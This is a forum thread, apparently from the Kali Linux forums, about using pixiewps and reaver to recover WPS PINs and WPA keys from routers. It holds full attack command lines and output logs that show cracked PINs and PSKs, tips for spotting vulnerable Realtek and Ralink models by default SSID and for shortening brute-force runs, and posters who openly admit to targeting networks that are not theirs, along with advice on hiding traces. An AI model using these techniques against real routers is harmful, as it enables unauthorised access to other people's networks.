Good example kcdtv. Thanks
Good example kcdtv. Thanks
That's a good little write-up kcdtv, very informative :-)
thank you so much for you explanation kcdtv i got it now
I realize now that there is a little trick that can be used to identify vulnerable routers very fast.
It seems that the default ssid with this realteck SoC (RTL819X project) is.... the router model.
My totolink N301 RT has got for default ssid TOTOLINK N301RT
Than i checked the default ssid for another device that have the same SDK, the Prolink PRN3001A.
The default SSID also gives straightforward the model in this case :
What about TrendNet TEW-638AP?
They have emulator online so that fast to check :
Conclusion : if you see the model name in the essid and that pixiewps suggest you to try again in brute force mode because it has a rtl819x you should use the options start and end focusing from end 2011 to end 2012/beginning 2013 when this kind of devices where launched.
I had a look to firmwares versions for this models and i didn't see any new firmware released after 2014 for this kind of devices.
So i am pretty sure that at least by adding --start 2014 you will find the PIN and gain some time as you won't brute force from 2016 to 2014.
This devices are not old but they are already at the end of their cicle of production since some years.
It means that manufacturer does not provide new version of firmware and the last "build time" that is used as a seed in DH exchange is the date of the version of one of he firmware available.
Other trick, if you see an image in one manual or checking with google, the layout for the web interface with this realtek SDK can give you a cue (if manufacturer didn't change it all)
An image is worth than explanation ...
Do you have an impression of déjÃ*-vu?
Any new video for this on youtube will feature the new reaver/bully. Just search it.
Very informative thread but I must say it's a little confusing to me as i'm relatively new to kali and i'm on a Nexus 7 2013 which doesn't really make things simple.
Kali does come with pixiewps and reaver but not the latest versions, nor the mod. I believe i effed something up while I was tryin to git clone both of these as I no longer have pixiewps (neither normally from bash or from the supposed install folder /usr/local/bin), wonder if this will require the whole flash stock/flash kali etc etc...
Also I'm running a TP-Link TL-WN722N and when I try to airmon-ng start wlan1mon ... the TP-Link flashes but nothing actually shows up, unlike in @kcdtv's post on the previous page. I can stop it fine and I can pick up networks when I run wifite
Any pointers? I know it sounds rather vague... I'm just looking for general to detailed resources/articles if you happen to know some or actually written some yourselves..
thanks
Kali 2.0 Live with new Reaver and Pixie-Dust returns 2 solutions for same AP 1 minute later in every attempt.
Why would this happen ?
DATA:
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
xx:xx:xx:xx:xx:xx -75 399 0 0 11 54e WPA2 CCMP PSK yyy_zzzzzzzz_123456
BSSID STATION PWR Rate Lost Frames Probe
root@kali:~# reaver -i wlan0 -b xx:xx:xx:xx:xx:xx -K 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: yyy_zzzzzzzz_123456)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
[P] PKE: ca:ac:0a:6f:4f:6b:f9:0c:d0:4a:82:2c:0c:47:f0:cc:cd :97:fb:5e:f0:3c:9c:bc:28:93:17:d8:ea:3b:19:c5:ef:9 0:9d:57:41:30:1f:03:5c:b7:4f:23:14:dc:39:2b:27:ea: 83:50:eb:56:90:43:bb:de:0e:e7:2d:49:47:89:88:ab:ea :c7:f1:bb:fc:7b:fd:21:aa:41:0a:08:8f:70:35:69:86:9 c:c4:48:f9:6f:a7:1f:2d:ce:b5:44:17:18:40:f9:22:f4: c1:e1:38:83:cd:3c:51:41:54:26:c4:36:2c:79:ce:ea:89 :67:ca:b8:44:99:e1:df:45:50:ef:a9:7a:3e:d7:90:e1:c f:af:f9:6b:82:4b:ad:61:f6:6d:63:ec:e1:cc:b6:dd:e0: 2e:5e:3b:f6:80:fc:26:e4:e2:d0:52:33:bf:fa:02:a8:27 :f1:82:b6:5a:4a:33:9d:a8:07:b9:f2:52:8f:ec:ab:52:a 5:b7:7d:3a:6a:1f:6b:30:2f
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[P] R-Nonce: 91:b0:15:9d:19:e6:11:a1:a2:c1:b4:5a:b4:7d:53:14
[P] PKR: 34:ef:cc:3d:69:6c:68:22:35:b3:88:b0:2f:57:c1:c2:54 :fb:08:53:70:d9:2f:ed:a2:9d:f5:83:ce:12:7f:11:c4:3 f:42:61:9b:db:65:b7:b2:4e:8a:04:92:9d:fd:9b:02:ee: ed:8f:d9:c3:84:28:d3:ec:aa:a9:0a:8c:06:75:0b:97:6e :f3:5d:db:a2:28:32:84:c9:99:b8:3c:7a:c4:92:ff:03:3 7:13:6c:f5:0f:d4:30:0f:80:0a:45:0d:9a:10:b8:54:ee: b5:1b:83:47:91:2f:a9:7d:b7:a2:16:1e:95:06:01:00:f6 :1e:4e:1e:40:33:59:f9:0e:04:3c:35:0c:21:b8:e3:62:f e:81:14:7c:ad:c7:08:5e:62:9d:4a:a3:07:e6:69:1f:a7: bb:f4:f9:5f:ed:76:42:73:2e:a9:28:5f:41:64:89:61:ff :b0:18:f6:22:a9:8c:81:18:3c:07:e8:9a:65:a6:ac:9a:d 3:23:eb:10:62:a2:d4:27:98
[P] AuthKey: b4:06:48:58:73:26:c6:5d:dd:13:c7:56:ce:71:ff:ef:de :48:51:4e:78:57:29:25:7f:40:b0:42:19:94:19:8e
[P] E-Hash1: 77:a5:51:89:2c:1b:e3:ef:b0:f2:8d:04:80:e9:25:1f:28 :34:a1:a2:0b:3c:bd:8f:c0:22:d7:e4:1f:7f:5e:34
[P] E-Hash2: 30:75:c2:fe:29:c0:bc:6d:d4:1a:d1:54:15:21:33:ac:23 :44:f1:4e:3a:35:31:ce:0f:c7:10:58:fa:34:8c:aa
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust][*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [+] WPS pin: 10427880
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]
Running reaver with the correct pin, wait ...
Cmd : reaver -i wlan0 -b xx:xx:xx:xx:xx:xx -c 11 -s y -vv -p 10427880
[Reaver Test] BSSID: xx:xx:xx:xx:xx:xx
[Reaver Test] Channel: 11
[Reaver Test] [+] WPS PIN: '10427880'
[Reaver Test] [+] WPA PSK: 'dc7bc520883f02b6e784772ae7340cda5c85c8b2d9f389e55 5a014277034ec16'
[Reaver Test] [+] AP SSID: 'yyy_zzzzzzzz_123456'
root@kali:~#
NEXT 1 MINUTE LATER
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: yyy_zzzzzzzzz_123456)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
[P] PKE: 29:2a:f4:1a:a8:68:ea:00:7f:e4:e3:a2:56:30:9c:86:11 :75:8d:e8:cf:f0:d5:42:fb:f7:84:06:9b:00:9c:a2:63:4 7:e4:9f:05:d8:a7:c9:4f:b1:63:4c:69:6f:9d:38:18:b9: 2e:ee:4d:a6:74:ad:8a:d3:c9:05:a2:74:b5:e9:6b:7e:86 :10:0f:7c:28:54:cd:d8:3c:19:4a:2a:6c:f7:b3:ac:bd:6 6:09:c1:86:43:18:be:f0:cb:24:f9:1f:cc:7b:21:ef:97: 46:a3:50:77:83:5f:90:f0:81:5d:77:0a:cf:d4:ec:ee:97 :db:90:ce:36:a1:3c:1e:ac:63:31:f8:ec:ef:1a:d1:51:1 a:9f:c8:4b:2f:fe:8f:f9:c2:23:6c:f3:e6:27:2e:a2:d4: 0d:fa:f3:cd:fe:4a:85:0b:89:86:1f:cd:20:1c:a1:90:cc :44:a4:d7:00:81:75:51:1c:9c:e1:f6:14:b5:cc:d9:11:e 9:fd:80:bc:86:cb:61:52:de
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[P] R-Nonce: 9f:8c:14:96:8c:11:b1:23:ad:c1:6b:8a:04:1a:e5:7c
[P] PKR: af:1b:86:49:f5:32:dc:9f:6b:77:fd:b8:70:3f:02:27:0e :80:ce:f4:f3:29:8c:85:6e:d1:87:21:ad:7a:27:37:b0:4 f:b7:27:36:bb:dc:0c:08:94:40:c6:56:0c:3b:91:41:71: bd:d2:74:3f:ea:39:cc:33:f4:be:c3:22:19:6d:b7:f5:ae :8b:16:ae:a0:0c:33:c3:a5:39:85:34:42:af:db:2d:00:5 8:09:01:53:bf:c5:f8:db:57:89:d3:73:eb:db:f6:06:3d: 0a:95:0a:a0:d2:08:ab:8c:2c:16:77:26:8d:9a:6f:0f:03 :9a:aa:2b:69:10:8e:e1:38:09:8f:05:6a:2a:f4:a6:ed:a 8:d7:c6:9d:f1:6b:b5:bf:ed:47:9d:4d:67:35:9d:a9:93: aa:e9:83:fc:30:93:8c:17:1c:4d:27:6f:00:b5:ad:09:3c :e7:76:38:9c:d3:b2:d3:37:bb:1a:00:4a:8b:e0:d5:79:e 2:86:c4:a6:7b:21:94:1e:ba
[P] AuthKey: ff:91:1a:65:26:a1:81:a4:2b:d3:f5:39:2d:e7:b8:5d:09 :29:56:fd:3f:7b:ca:01:ac:60:fc:66:5a:3a:2b:93
[P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
[P] PKE: 49:da:96:93:49:b0:a9:71:4a:82:5c:9b:9a:e3:cc:39:04 :f1:9c:08:9e:2c:de:a1:e5:1e:c6:79:6b:2c:84:88:b7:4 f:0c:c8:6a:b5:07:7b:2c:d6:1b:5b:f7:66:be:90:53:3b: ea:b2:a6:95:5a:26:d6:81:ee:92:dd:5c:e6:da:c4:55:c9 :9b:88:9f:27:16:a6:d8:8d:35:7c:46:45:14:65:21:94:2 f:c8:44:5a:47:31:12:60:9b:53:54:df:ae:b8:36:4a:44: 39:74:6e:18:6c:32:e1:f7:ab:e8:c8:46:d2:67:41:2d:2f :e1:77:a5:ea:4e:63:2e:54:ba:41:c6:58:f3:4c:df:9c:c c:9c:0f:a8:48:17:be:e7:a3:b4:2a:e7:a4:d9:0a:3a:b6: f6:f5:04:0b:b1:f6:e5:d9:5a:88:c8:7e:da:0a:90:d1:08 :74:61:47:23:b1:05:b2:e6:83:76:07:fe:06:38:5c:c9:1 b:21:ee:1a:fd:88:28:ea:41
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[P] R-Nonce: b9:a2:80:a8:97:75:b9:10:c4:1a:fe:d2:f9:97:59:0a
[P] PKR: e9:10:a8:1a:a5:cd:21:9a:67:93:0d:ee:2a:a8:30:87:6f :80:e8:32:b3:62:c4:cb:a3:2d:72:fc:66:ab:93:ea:24:b c:d0:b1:29:1c:b6:cb:fa:dc:76:ab:77:99:9d:ae:da:91: 02:d6:de:fe:e6:1a:86:c4:dc:c9:31:3d:08:07:5f:07:84 :41:77:15:2f:74:75:fb:62:46:e8:c8:94:c4:28:c1:63:a 3:07:2b:46:30:1e:11:e2:c2:c0:4d:61:ca:32:7d:23:6f: 88:07:aa:da:95:29:77:6d:7d:28:da:56:0d:a6:fa:57:81 :7f:cb:df:bf:8c:07:bd:74:88:f5:16:51:48:08:83:ab:5 f:71:8c:c4:53:dc:b0:36:85:ab:ea:1b:97:0d:a8:38:50: 55:7f:89:73:23:e1:0f:d7:ba:ad:0c:8e:77:3e:ab:1f:c0 :73:9e:d1:5e:57:46:52:61:f2:6c:f6:e2:44:2d:ec:2c:b 3:6a:d4:84:c1:67:b3:a5:ea
[P] AuthKey: e4:a5:f2:82:31:25:aa:e0:5b:cb:7b:09:4e:91:b7:46:28 :95:8a:ae:d7:55:4a:52:87:38:87:d0:d4:f0:6d:0d
[P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
[P] PKE: 2b:d9:be:8f:b9:9f:53:4f:30:2e:e7:b0:e0:e8:0f:21:3b :94:44:73:c4:70:ed:d0:24:45:57:e9:74:10:38:63:10:7 e:26:7d:57:3b:38:3d:f7:e1:c6:40:09:a4:cd:c1:46:5d: e1:60:97:aa:ca:a1:24:c6:ca:fa:38:5a:9c:56:65:18:2e :14:35:11:26:17:0a:d9:40:04:7b:99:dc:0f:90:5d:63:4 d:09:4c:85:19:8c:9e:19:a8:48:85:97:7f:ae:7c:a0:29: fa:12:d2:fb:0c:b3:30:2d:46:61:fa:2d:d9:5f:9d:ee:9d :6e:1d:b6:1d:08:4c:64:f7:1f:3a:b7:cb:54:f4:03:b0:6 0:94:c2:cb:b4:e5:d7:2f:71:1b:ae:57:c8:60:c5:dd:a1: c9:82:31:81:70:af:45:97:67:21:d3:d2:4f:1e:f2:81:48 :14:8d:67:be:58:f7:3d:ff:ed:e2:fc:50:8a:f7:ef:e1:0 0:9a:9a:9b:0e:b6:a4:f5:80
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[P] R-Nonce: 47:b8:f7:80:fc:31:5b:a7:c7:58:6f:40:30:68:a9:04
[P] PKR: 4b:85:25:b3:7e:61:dc:a6:c6:d3:c2:45:5d:90:3a:cb:b0 :53:37:94:02:dd:29:17:68:04:1d:3b:3a:6a:1a:40:ca:c 1:8b:22:e8:4b:ae:f6:08:d8:a7:a3:6c:1b:29:ea:ec:95: 1d:ed:19:56:89:15:f0:0f:8f:74:73:dd:ba:27:0b:ea:0b :bd:54:36:24:57:40:25:be:15:e1:a8:9a:24:d8:10:04:2 5:66:f3:01:f7:b1:84:51:b3:7d:cc:a7:3c:e4:c8:4c:d9: 4e:52:77:2c:61:3a:d0:ed:dc:b3:e0:31:17:77:5e:e7:9c :51:9a:93:e2:09:bc:cf:f1:d2:d6:91:5c:e0:07:ec:34:1 b:77:89:47:ec:f2:65:88:97:65:de:74:2f:0b:69:6b:44: 20:f9:d1:b3:ab:07:c9:e7:4d:e0:21:a2:01:b9:1a:33:e9 :b6:5b:78:ee:b4:46:62:7c:70:06:d0:43:57:d1:04:76:d 9:e6:64:1b:d6:50:3a:27:31
[P] AuthKey: 5f:c8:ce:60:82:fe:54:52:5d:d3:88:0a:5f:45:68:77:78 :60:23:1d:f6:59:82:74:61:cd:bc:0f:96:e9:36:7a
[P] E-Hash1: 5e:6f:2d:98:5c:81:ab:8e:46:21:76:99:b0:be:81:98:0f :25:88:ae:ee:c0:24:67:49:23:c4:4d:01:f7:d2:a7
[P] E-Hash2: a3:1a:25:b2:34:75:46:b4:3a:a8:df:12:7e:01:44:e5:d3 :6e:66:1e:73:81:bd:4a:5e:f4:2d:fe:46:12:19:80
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust][*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [+] WPS pin: 10427880
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 0 s
[Pixie-Dust]
Running reaver with the correct pin, wait ...
Cmd : reaver -i wlan0 -b xx:xx:xx:xx:xx:xx -c 11 -s y -vv -p 10427880
[Reaver Test] BSSID: xx:xx:xx:xx:xx:xx
[Reaver Test] Channel: 11
[Reaver Test] [+] WPS PIN: '10427880'
[Reaver Test] [+] WPA PSK: 'd717380be0f1784ca16d3fc559d1a62a5e53a549cc061eb98 e708c2019e01ca0'
[Reaver Test] [+] AP SSID: 'yyy_zzzzzzzzz_123456'
root@kali:~#
Pretty sure it is a hash of the actual password. Try with Bully: https://github.com/aanarchyy/bully
can any one explain -f option in pixie wps and details about PRNG ... steps involved in PRNG attack including command .. also inform whether linksys E 900 is vulnerable to attack ??
I dunno
Same result with bully and 7 of 8 of the pin numbers.
This is not a crisis.
I thought there may be some magic code in the AP or filter when another mac associated with it.
It looked like a randomly generated 64 bit hex password.
Thanks for the reply
If youl like, I can post the Bully log data.
Let me clarify my two posts using Reaver and Bully.
I am unable to connect to this AP with the first password solution.
So, I used Reaver with Pixiedust 1 minute apart to glean information.
There is no connect when I turn around and use my other desktop with the copied PSK on a USB.
I provided the log to show the changing (the 64 hex number) answers.
The pin number is always the same.
Reaver has worked in about 5 cases and I can connect with those routers.
There has been about 30 cases when the pin is not found or the association fails.
I may have wrongly posted the Reaver log in a different thread.
I don't think posting the Bully log will provide more helpful information.
Last edited by helen2016; 2016-03-09 at 03:48. Reason: Clarification
That's the PMKIt looked like a randomly generated 64 bit hex password.
Yeah, you can use the 64 bit password hash just fine.
Reply to "Try with Bully" probably posted in wrong thread.
The results were the same, changing PSK and no connect.
The pin number is always the same.
My last attempt was copy and transfer the 64 PSK from laptop to desktop using TMAC V6 to spoof the client MAC obtained from airodump-ng.
Still unable to connect, but I can see the process starting and failing.
My wireless knowledge and coding ability combined with stumbling terminal syntex is far too low to go any further.
Thanks for the relies and comments.
Hm, my last consideration would either be that your wireless card is bad(which I doubt since it seems to handle reaver and bully ok up to the point of receiving the PSK) or the router does not have WPS configured (or in any event, configured properly).
First of all thanks to all the developers who have worked on this project.
Now to help helen2016 about psk.
You will need an android device.
P.s. Rooted device will be better.
Go to wifi settings.
Tap on essid. You will see a pop up to enter password. Tick advanced option. You will see Wps and dropdown box saying off. Tap on it and select pin from access point enter your Wps pin.
In less than two minutes you will be connected if Wps pin is correct and Wps is active on AP.
Now u can navigate to /data/misc/wifi/
Open wpa_supplicant.conf as text
And you can see acquired password.
Give it a try
@ alkesh
You do not need and android device : any GNU-Linux distribution (kali itslef) can connect with a WPS PIN using wpa_cli from wpa_supplicant
@ Helen
You can connect with the PMK entered directly, at least with a GNU-Linux distribution (i don't know or use windows) .
Don't forget to remove the "two points"...
The passphrase is not used directly in WPA protocol, it is just for human, what is used is the PMK that you can calculate like this :
A string is created wiith the passphrase and ssid lenght, it is then passed 4096 times through SHA-1 hash function and you keep the 256 first bytes (64 hex characters) to get your PMKPMK = PBKDF2(HMAC−SHA1, passphrase, ssid, 4096, 256)
It looks like a classical distance issue
Get closer to your router
And this "problem" doesn't have to do with pixiewps as the PIN is generated.
You can check the PIN on the sticker under your router
cheers
kcdtv is right, you don't need an Android. Any linux distribution should do.
Hi,
Please, I'm trying to test Ralink RT2860 but it constanly gives me a error "wps transaction failed (0x04)" and I can't get m3 or m4 messages.
How can I get e-hashes out of this?
it may be the distance, obstacles, many factors. what airodump shows on the pwr and rqx of that ap?
The power is between -65 to -70. I also tried to test one by sitting just right next to it. I don't think it has anything with obstacle and stuff. Router is from Huawei. And reaver says:
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Name: Ralink Wireless Access Point
[P] WPS Model Number: RT2860
Wash indicates that WPS is not locked. Super confused. Please, help?
Last edited by whitetsagan; 2016-04-13 at 15:43.
Please, anyone?
It does nothing but keeps authenticating for hours. The authentication process is always successful but at the end it creates another authentication process and so on.
Did anyone has that kind of problem with pixiewps?
Maybe WPS is enabled but not configured.
post what "airodump-ng wlan0mon --wps" gives. as soxrox said, it may not be configured
you should edit your pictures (it doesn't look like you are testing your network )
anyway your problem is not a pixiewps issues : getting the hashes is one thing handled by others programs (and you can do it yourself by having a look to your capture file) pixiewps is "just" about using this hashes to get the PIN.
Last edited by kcdtv; 2016-04-28 at 20:02.
Brother, haha. Let's be honest, you, me, we all know we are not trying to get reaver/pixie working just to mess with our own network. FYI, I have got one exactly as same as this network, just not at the moment, which throws same error. Trust me one this one. :P But even though I have my own, I don't have access to the network config though.
I am well aware of that it is not about pixie. It's about reaver. Reason why I am here is nobody there to give proper answer in other discussions. And I tend to see experts who are modifying reaver prowl around here. So please share what you know about this. Have I been honest enough? I pretty much think so. :P
bro', i am not judging you or telling you what to do or not.Brother, haha. Let's be honest, you, me, we all know we are not trying to get reaver/pixie working just to mess with our own network.
My point of view is not moral, i am not administrator or moderator of this forum and i really don't care about what you do at your home, that's not my business and i am not a cop, **** no!
The point is that if you are not in good conditions with a real knowledge about the configuration of the access point ... if you get "error code 04 wps transaction failed" or something like this there could be so much reasons... from interferences made by other clients associated to the RXQ you get, you don't even know if WPS is properly enabled,
So "experts" will tell you to get closer to access point, to disconnect all devices when you make your test, to rise delay between PIN...
I can give you an example : Spanish livebox 2.1 will let you send a PIN just if you are very very close to the access point with delay 5 and will handle one PIN out 5, It is not a defense mechanism or something like that, just the way wps is implemented (badly)
while you could PIN brute force fast as **** other devices in bad conditions that would not even allow you to reach 1MBpS when you connect to them in the same conditions...
So if yo are on "spanish livebox 2.1" kind of router, there is nothing yo can do, no bug, and nothing to tell you... when i see this default ssid i imagine one of this crappy "box" with so little range that i can easily imagine why you cannot "reaver" it if you are more than 10 meters away from the device..
Anyway, you are not giving enough elements to answer you... scan with airodmp-ng should be done with --bssid filter and --channel filter, we should see the output of your probes to get info about the device, we should get an exact stdout of what is going on with reaver.
If this topic is about pixiewps : Do you think it is respectful for wiire who made this tool for all of us to use his thread to ask whatever yo want? If everybody does like you, what would be the result?Reason why I am here is nobody there to give proper answer in other discussions.
You know .. be honnest with your girl (or boy), be honest with your bro' and mum...but with the rest.. be clever.Have I been honest enough? I pretty much think so. :P
Saying in a public forum that you are "hacking" network and uploading pictures with full bssid and essid of this networks is not clever.
That why i recommend you to "edit" your pictures by erasing the end of bssid and essid... because doing like yo do is like declaring to the whole world "here i am! Check this macs and essid; i live 25 meters aways!"
Well, my point is: Please, reconsider the way you act in this thread, i think it is a shame to "deviate" it and this forum is full of shity and useless themes that you could use to ask questions. But the work from wiire and this thread is without any doubt one of the best and more usefull in this whole forum, please, respect it and help to respect it.
take care
First I saw t6x's post above somewhere in this thread and thought I could find some useful information about it because the chipset he mentioned and mine are the same.
I tried reaver on my router by sitting just right next to it and it was the same. Same error 0x04. My knowledge about this whole kali is so shallow but I am very interested in it. But it's kind of sad there is so few are to tell. I could try giving every info needed.
I understood everything so clear that you could see adele rolling from 1000 meters away. And yes, I have done a bad thing regarding morality literally. I do have respect for those who are modifying and developing for nothing, too. I actually have almost nothing to say as defense and you got me real good. But also please try to understand and consider what I am mentioning since we are in the bucket.
The same chipset doesn't mean anything. It's like saying my car has the same motor as you, why doesn't it work? Every system may be configured differently, slightly different parts, different firmware, different implementations, perhaps they are not using the reference code supplied by the chip manufacturer. There are a plethora of possible solutions to your answer, and without the proper information we can't help. We need to know the model of the AP, chipset, manufacturer, if WPS is configured or not, and if you want to really get into it, it is best if you have administrator access so we can see the configuration of it and make an assessment from there.
Dear any Solution for this issue of RTL8671? I am still waiting any update for This stupid model RTL8671.
No. There will be an update if it is supported, no need to keep asking.
you said it is an offline attack right ?
so does this mean i can bruteforce when i am far from AP ?
if i have all those parameter values.. ?
Yes it is offline. Yes you can bruteforce when you are far from the AP, but you need to have all the information gathered from it first, meaning you have to be near it at some point to get it.
Got the wps pin using "reaver -i wlan0mon -b (insert bssid here) -vvv -W 2 (it is a belkin router) -a -c (insert channel number here), tried to get the passwd using the --pin= option in reaver and it gives me a hash looking thing for the passwd. I still couldn't use that "hash" to connect to the network. I tried to disconnect all AP's from the client as well as changing my mac address to one of the AP's connected on the network, still no success. However, I couldn't help but notice that each time I tried with the passwd I got from pixie, it got NACS errors but every time I tried with a different wps pin than the correct one, it tests it and reports that it didn't work. Kinda stuck here. Some information: WPA and WPS (no WPA2), Belkin chipset, WPS is not locked and is, according to the command "wash -i wlan0mon" at a version 1.0 and it does send out beacons frequently. I'm not very far away from the router, according to the wash command, -59. I just want to learn why this is happening and explore.
Rtl8671 and linksys e900 is there any way to crack wps pin of above chipset??
We started a new thread for collecting data: https://forums.kali.org/showthread.p...ll=1#post75368